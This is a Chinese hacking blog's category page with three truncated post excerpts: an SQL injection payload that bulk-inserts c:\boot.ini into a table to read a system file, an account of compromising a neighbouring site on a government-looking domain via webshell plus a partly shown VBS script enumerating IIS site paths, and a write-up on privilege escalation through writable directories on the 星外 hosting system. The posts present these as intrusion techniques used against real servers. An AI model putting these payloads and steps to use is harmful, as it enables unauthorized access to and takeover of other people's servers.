Hack

摘要: drop table [nspcn]CREATE TABLE [nspcn](ResultTxt nvarchar(1024) NULL)BULK INSERT [nspcn] FROM 'c:\boot.ini' WITH (KEEPNULLS)insert into [nspcn] values ('g_over');Alter Table [nspcn] add id int NOT NULL IDENTITY (1,1)select * from [nspcn]阅读全文

摘要: 今晚在搞 http://gov.com.im/ 的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过 pr 提权，单 asp 一执行 pr 就卡死了。。 无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到 shell 上立马就搞定了目标站的路径，获取 IIS 网站路径和其他基本信息也是使用一个 VBS 脚本搞定的，这个在我 blog 中有一个文章帖出来代码。这里我将就再帖下，并说明用法！ Set ObjService=GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservic阅读全文

摘要: 秒杀星外虚拟机系统（星外虚拟机提权"0day"） 作者：作者：Rootkit 原文：http://t00ls.net/thread-13600-1-1.html星外虚拟机一直被认为很BT，其实我感 觉还是很好搞，至少他支持aspx。找到有的执行目录一般99% 可以秒杀他 ，拿下服务器权限。星外可执行的目录最新版本C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ 这个目录，还有就是C:\PHP\PEAR 这个目录。C:\PHP\PEAR在10，11月份的时候我还发现很多虚拟机可写可执行的，现在发阅读全文